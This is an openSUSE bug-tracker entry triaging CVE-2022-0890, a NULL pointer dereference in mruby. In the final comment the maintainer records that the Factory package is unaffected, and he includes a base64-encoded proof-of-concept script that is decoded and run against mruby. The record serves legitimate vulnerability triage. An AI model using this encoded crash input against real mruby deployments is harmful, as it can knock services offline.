Bug 1196950 (CVE-2022-0890) - VUL-0: CVE-2022-0890: mruby: NULL Pointer Dereference prior to 3.2.
Summary: VUL-0: CVE-2022-0890: mruby: NULL Pointer Dereference prior to 3.2.
Status: RESOLVED WORKSFORME
Alias: CVE-2022-0890
Product: openSUSE Tumbleweed
Classification: openSUSE
Component: Security (show other bugs)
Version: Current
Hardware: Other Other
: P3 - Medium : Normal (vote)
Target Milestone: ---
Assignee: Ferdinand Thiessen
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/325728/#r...
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2022-03-10 08:16 UTC by Thomas Leroy
Modified: 2022-04-26 19:28 UTC (History)
0 users

See Also:
Found By: ---
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Comment 1 Thomas Leroy 2022-03-10 08:19:22 UTC 
Will probably be shipped in version 3.2, not released yet.
Comment 2 Ferdinand Thiessen 2022-04-26 19:28:08 UTC 
Version on Factory not affected, POC does not work.
Probably only the git version is affected not the 3.0 release (or fixed by other patch).

> % echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
> % mruby ./poc
> exit 0